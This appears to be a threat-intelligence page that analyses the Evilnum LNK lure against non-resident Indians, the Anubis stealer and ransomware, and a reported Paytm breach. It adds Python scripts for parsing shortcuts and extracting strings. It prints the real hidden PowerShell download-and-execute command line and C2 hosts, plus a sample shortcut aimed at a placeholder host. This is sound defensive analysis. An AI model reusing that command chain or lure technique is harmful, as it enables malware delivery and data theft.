Evilnum Infostealer targets overseas Indians

The Evilnum group targets non-resident Indians (NRIs) with spear-phishing emails that pose as a document on new income tax rules and deliver an infostealer. The goal is to spy on high-net-worth individuals (HNIs), steal credentials and gain access to financial information; the stolen data is typically sold to other criminals on underground forums.

The attack typically starts with a spear-phishing email carrying a link to a ZIP archive. The archive contains a malicious Windows shortcut (LNK) file named “Income tax new rules for NRI.pdf.lnk”. Explorer never displays the .lnk extension, even when the option to hide extensions for known file types is turned off, so the file appears to the victim as a PDF.

Lnk File: Income tax new rules for NRI.pdf.lnk
Link Flags: HAS SHELLIDLIST | POINTS TO FILE/DIR | NO DESCRIPTION | HAS RELATIVE PATH STRING | HAS WORKING DIRECTORY | HAS CMD LINE ARGS | HAS CUSTOM ICON
File Attributes: ARCHIVE
Create Time: 2019-03-19 10:16:56.805162
Access Time: 2019-03-19 10:16:56.805162
Modified Time: 2019-03-19 10:16:56.805162
Target length: 451584
Icon Index: 0
ShowWnd: SW_SHOWMINNOACTIVE
HotKey: 0
Target is on local volume
Volume Type: Fixed (Hard Disk)
Volume Serial: 26da47ae
Vol Label:
Base Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(App Path:) Remaining Path:
Relative Path: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Working Dir: %SystemRoot%\system32\
Command Line:
-w hidden -nop -ep bypass -c "IEX(New-Object System.Net.WebClient).DownloadFile('https://ccdn.microsoftdocs.workers.dev/_uploads/Income tax new rules for NRI.pdf','%userprofile%\Downloads\Income tax new rules for NRI.pdf');(New-Object -com Shell.Application).ShellExecute('%userprofile%\Downloads\Income tax new rules for NRI.pdf');IEX(New-Object System.Net.WebClient).DownloadFile('https://ccdn.microsoftdocs.workers.dev/_uploads/event.dat','C:\Users\Public\Music\event.log');IEX(New-Object System.Net.WebClient).DownloadFile('https://ccdn.microsoftdocs.workers.dev/_uploads/conhost.dat','%temp%\conhost.exe');(New-Object -com Shell.Application).ShellExecute('%temp%\conhost.exe');"
Icon filename: .\pdf.pdf

The shortcut's target is powershell.exe, launched with a hidden window (-w hidden), no profile (-nop) and the execution policy bypassed (-ep bypass). The one-line script first downloads the decoy PDF into the user's Downloads folder and opens it, so the victim sees the promised document; it then fetches event.dat into C:\Users\Public\Music\event.log and conhost.dat into %temp%\conhost.exe, and executes the latter. All three files are served from ccdn.microsoftdocs.workers.dev, a Cloudflare Workers subdomain named to resemble Microsoft documentation hosting. Two details worth noting when triaging such shortcuts: the IEX wrappers are redundant, since DownloadFile returns nothing to evaluate, and PowerShell does not expand %userprofile% or %temp% inside single-quoted strings, so the chain depends on those variables being expanded in the shortcut's arguments before PowerShell starts.
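The fields in the dump above come straight from the Shell Link binary format (header, optional IDList and LinkInfo, then the StringData items in a fixed order). The following Python script is an added example, not code from the original page or from any tool it describes: parse_lnk reads the header and StringData of a .lnk file, and suspicious_indicators flags the traits seen in this shortcut (script-host target, hidden or minimised window, execution-policy bypass, download-and-execute arguments, a document icon on an executable target, a double extension). build_sample_lnk assembles a constructed shortcut in memory with the same layout as the one analysed here; its command line is shortened and assumed, pointing at the placeholder host example.invalid, and its IDList and LinkInfo are placeholders that the parser only skips over. The SCRIPT_HOSTS and DOC_EXTS lists are assumed heuristics, not taken from the page.

```python
import struct
from datetime import datetime, timedelta, timezone

# LinkFlags bits from the Shell Link header (MS-SHLLINK 2.1.1) that this parser uses.
FLAGS = {
    "HasLinkTargetIDList": 0x01, "HasLinkInfo": 0x02, "HasName": 0x04,
    "HasRelativePath": 0x08, "HasWorkingDir": 0x10, "HasArguments": 0x20,
    "HasIconLocation": 0x40, "IsUnicode": 0x80,
}
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
SW_SHOWMINNOACTIVE = 7
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",     # assumed heuristic list
                "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe")
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt")

def filetime_to_datetime(ft):
    return EPOCH_1601 + timedelta(microseconds=ft // 10)      # FILETIME: 100 ns ticks since 1601

def datetime_to_filetime(dt):
    d = dt - EPOCH_1601
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10

def _read_string(data, off, unicode):
    # StringData item: uint16 character count, then the characters, no terminator.
    count, = struct.unpack_from("<H", data, off)
    off += 2
    if unicode:
        return data[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return data[off:off + count].decode("cp1252"), off + count

def parse_lnk(data):
    size, clsid, flags, attrs = struct.unpack_from("<I16sII", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    ctime, atime, wtime, fsize, icon_idx, show = struct.unpack_from("<QQQIiI", data, 28)
    off = 0x4C
    if flags & FLAGS["HasLinkTargetIDList"]:    # skip the IDList: uint16 size + items
        id_list_size, = struct.unpack_from("<H", data, off)
        off += 2 + id_list_size
    if flags & FLAGS["HasLinkInfo"]:            # LinkInfoSize counts itself
        link_info_size, = struct.unpack_from("<I", data, off)
        off += link_info_size
    link = {"flags": [n for n, b in FLAGS.items() if flags & b], "file_attributes": attrs,
            "file_size": fsize, "icon_index": icon_idx, "show_command": show,
            "created": filetime_to_datetime(ctime), "accessed": filetime_to_datetime(atime),
            "modified": filetime_to_datetime(wtime)}
    unicode = bool(flags & FLAGS["IsUnicode"])
    for flag, key in (("HasName", "name"), ("HasRelativePath", "relative_path"),
                      ("HasWorkingDir", "working_dir"), ("HasArguments", "arguments"),
                      ("HasIconLocation", "icon_location")):
        if flags & FLAGS[flag]:
            link[key], off = _read_string(data, off, unicode)
    return link

def suspicious_indicators(link, filename=""):
    hits = []
    target = link.get("relative_path", "").lower()
    args = link.get("arguments", "").lower()
    icon = link.get("icon_location", "").lower()
    if target.endswith(SCRIPT_HOSTS):
        hits.append("target is a script host: " + target.rsplit("\\", 1)[-1])
    if link["show_command"] == SW_SHOWMINNOACTIVE or "-w hidden" in args or "-windowstyle hidden" in args:
        hits.append("window hidden or minimised")
    if "-ep bypass" in args or "-executionpolicy bypass" in args:
        hits.append("execution policy bypass")
    for token in ("downloadfile", "downloadstring", "iex", "http"):
        if token in args:
            hits.append("download/eval in arguments: " + token)
    if icon.endswith(DOC_EXTS) and target.endswith(".exe"):
        hits.append("document icon on an executable target")
    stem = filename.lower()[:-4] if filename.lower().endswith(".lnk") else ""
    if stem.endswith(DOC_EXTS):
        hits.append("double extension: " + filename)
    return hits

# Constructed sample with the layout of the shortcut analysed above; the command line
# is shortened and assumed, pointing at the placeholder host example.invalid.
SAMPLE_ARGS = ("-w hidden -nop -ep bypass -c \"IEX(New-Object System.Net.WebClient)"
               ".DownloadFile('https://example.invalid/decoy.pdf','%temp%\\decoy.pdf');"
               "(New-Object -com Shell.Application).ShellExecute('%temp%\\conhost.exe');\"")

def build_sample_lnk(arguments=SAMPLE_ARGS):
    flags = sum(FLAGS[n] for n in ("HasLinkTargetIDList", "HasLinkInfo", "HasRelativePath",
                                    "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode"))
    t = datetime_to_filetime(datetime(2019, 3, 19, 10, 16, 56, tzinfo=timezone.utc))
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x20,   # 0x20 = ARCHIVE
                         t, t, t, 451584, 0, SW_SHOWMINNOACTIVE, 0, 0, 0, 0)
    id_list = struct.pack("<H", 6) + b"\x04\x00\x1f\x50" + b"\x00\x00"        # placeholder IDList
    link_info = struct.pack("<I", 28) + bytes(24)                               # placeholder LinkInfo

    def s(text):                                                                # one StringData item
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return (header + id_list + link_info
            + s("..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe")
            + s("%SystemRoot%\\system32\\") + s(arguments) + s(".\\pdf.pdf"))
```

To triage a real file, pass `open(path, "rb").read()` to parse_lnk and the file's name to suspicious_indicators; the parser deliberately skips the IDList and LinkInfo rather than interpreting them, because the command line, working directory and icon location in StringData are what decide whether a shortcut is a downloader.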

The binary is saved as conhost.exe in the %temp% directory, borrowing the name of the legitimate Windows console host. It carries a digital signature that does not validate.

The binary embeds a list of MAC addresses (vendor prefixes) associated with virtual environments and will not run its payload if the host's network adapter matches one of them, a common sandbox-evasion check. The executable code is protected, and the malicious payload is decrypted only at run time. Once running, the payload sends the following information to the C2 server:

  • Username
  • UUID
  • Machine Name
  • Antivirus Installed
  • OS Name
  • OS Version
  • OS installation date

On commands received from the C2 server, the malware can perform the following:

  • Keylogging
  • Screen Capturing
  • Downloading additional malware
  • Executing commands

In other incidents, Evilnum has used malicious Windows shortcut (LNK) files disguised as scans of credit cards, ID cards, utility bills and other documents to lure victims.

God of death steals your data: Ransomware/Anubis

A new information-stealing malware, detected as Ransomware/Anubis, is being actively distributed in the wild. Its code is forked from the Loki stealer. It is written in C#, and its authors call it Anubis in its settings; the name is shared with an unrelated family of Android banking malware.

Technical Details

Binary Info
MD5: B73E3725DDCDDBBF83DB1610C162A950
SHA1: 5862E19E3A31F88DD7D69F7247B0AEAB872F8EFA
Size: 266,240 bytes
DateTimeStamp: 22 June 2020 8:57:44 PM GMT

Anubis contains code to collect system information and screenshots, and to steal passwords, browser cookies, credit card details and cryptocurrency wallets; it also carries a file-locking (ransomware) module.

The domain anubis.fun, which hosts the admin panel, resolves to three IPv4 addresses. The two 104.27.x.x addresses fall in Cloudflare's 104.16.0.0/12 range, so they belong to the CDN proxy rather than the origin server:
104.27.159.138
104.27.158.138
171.67.191.19 (down)

The admin panel is protected by authentication.

The site uses a TLS certificate issued by GlobalSign.


It captures images from the webcam as well as screenshots of the current screen.


It steals credentials from the FileZilla and Telegram applications.

It steals cookies stored by web browsers. It also steals wallet files for the following cryptocurrencies and wallet applications (Electrum is a Bitcoin wallet rather than a currency):

  • Bitcoin
  • Bytecoin
  • Dashcoin
  • Electrum
  • Ethereum
  • Litecoin

It steals credit card details from web browser storage.

It steals credentials from NordVPN.


It collects the following information from infected machines:

  • Public IP address
  • Country
  • State
  • City
  • Timezone
  • ZIP
  • ISP
  • Coordinates
  • User name
  • Machine name
  • UUID
  • HWID
  • CPU
  • GPU
  • RAM
  • MAC id
  • Screen resolution
  • System language
  • Browser versions

The collected information is sent to the C2 server; the C2 URI is hard-coded in the binary's settings.

It steals credentials from Steam, the video game distribution platform.


The ransomware (file-locking) functionality is not executed in this sample, but it would run if the feature were enabled in the binary's settings.

Encrypted (locked) files are renamed by appending the “.loki” extension. The file-locker module skips files smaller than 30 MB.

The ransomware note is hard coded in the binary.
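Because Anubis is a C# binary, its string literals (the C2 URI in the settings, the “.loki” extension and the ransom note) sit in the .NET #US heap as UTF-16LE, where an ASCII-only `strings` pass does not see them. The following Python script is an added example, not code from the original page or from the malware's authors: extract_strings scans a byte blob for both ASCII and UTF-16LE runs, and triage buckets the results into C2 URL candidates, bare file extensions, the family names the page mentions and ransom-note wording. build_sample_blob constructs a stand-in for a .NET PE (DOS stub, import names, a #US-style heap) using the placeholder host example.invalid; it is constructed data, not bytes from the Anubis sample, and the regular expressions are assumed heuristics.

```python
import re

# C# string literals live in the .NET #US heap as UTF-16LE, so an ASCII-only
# strings run misses them; scan for both encodings.
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[\w.\-/%?=&]*)?", re.I)
EXT_RE = re.compile(r"\.[A-Za-z0-9]{2,8}")                 # a bare extension such as ".loki"
NAME_RE = re.compile(r"\b(anubis|loki)\b", re.I)           # family names mentioned on the page
NOTE_RE = re.compile(r"(encrypted|decrypt|bitcoin|ransom)", re.I)


def extract_strings(blob, min_len=4):
    """Return (encoding, offset, text) for ASCII and UTF-16LE runs of printable characters."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [("ascii", m.start(), m.group().decode("ascii")) for m in ascii_re.finditer(blob)]
    found += [("utf16", m.start(), m.group().decode("utf-16-le")) for m in utf16_re.finditer(blob)]
    return sorted(found, key=lambda t: t[1])


def triage(strings):
    """Bucket extracted strings into the indicator types described above."""
    report = {"urls": [], "extensions": [], "family_names": [], "ransom_note": []}
    for enc, off, text in strings:
        for url in URL_RE.findall(text):
            report["urls"].append((enc, off, url))
        if EXT_RE.fullmatch(text):
            report["extensions"].append((enc, off, text))
        if NAME_RE.search(text):
            report["family_names"].append((enc, off, text))
        if NOTE_RE.search(text):
            report["ransom_note"].append((enc, off, text))
    return report


def build_sample_blob():
    """Constructed stand-in for a .NET PE: DOS stub, import names, then a #US-style heap
    whose entries carry a single-byte length prefix (valid for strings under 64 characters)."""
    def us(text):
        enc = text.encode("utf-16-le")
        assert len(enc) + 1 < 0x80
        return bytes([len(enc) + 1]) + enc + b"\x00"       # length byte, chars, terminal byte
    return (b"MZ\x90\x00" + bytes(40) + b"This program cannot be run in DOS mode.\r\n$" + bytes(16)
            + b"mscoree.dll\x00_CorExeMain\x00" + bytes(8) + b"#US\x00\x00"
            + us("https://example.invalid/panel/gate.php") + us(".loki") + us("Anubis")
            + us("Your files have been encrypted. Contact us to decrypt") + bytes(16))
```

On a real sample, `triage(extract_strings(open(path, "rb").read()))` gives file offsets for each hit, which is enough to locate the settings class in a decompiler; note that a packed or obfuscated build will show none of these until the payload is unpacked, as the page describes for the Evilnum binary.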

 

Paytm database stolen by Hackers

A massive database breach has reportedly hit Paytm, an Indian payment system and financial technology company. The hacker group KelvinSecTeam is reportedly responsible for the attack.

KelvinSecTeam

Members of the group usually pose as ethical hackers offering help to companies that run bug bounty programs. The group appears to have operated underground for more than three years, illegally breaking into systems and accessing sensitive information belonging to organizations and individuals.

The team's profile on a hacker forum lists its occupation as “APT” (advanced persistent threat). The domain kelvinsecuritylabs.com was registered through GoDaddy on 2020-05-21.

The group sells stolen databases through store.kelvinsecuritylabs.com or via:

  • Email: vipsuscriptionkelvinsecurityv1@protonmail.com
  • Telegram: Contact @kelvinsecurity

The group has also tweeted credentials from hacked accounts.

Paytm Breach

The volume of data stolen is reportedly around 85 GB. Our sources claim the attackers demanded a ransom of 10 ETH.

KelvinSecTeam was reportedly able to upload the Adminer tool to a Paytm server and gain unrestricted access to its databases. Adminer is a database management tool distributed as a single PHP file, primarily for MySQL; once dropped on a web server it gives anyone who can reach it a full SQL client for every database the server can connect to, which is why an unexpected adminer.php under a web root is a strong indicator of compromise.

Sources also claim the attackers were helped by an insider on Paytm's development team; the attackers' own message states that they received the database through a Paytm developer. The attackers further claimed to be receiving a ransom from Paytm. The group is notorious for selling hacked databases, and its past behavior shows that it leaks stolen data even after a ransom has been paid.

A Paytm spokesperson has stated that the company's data is safe but has not confirmed the breach.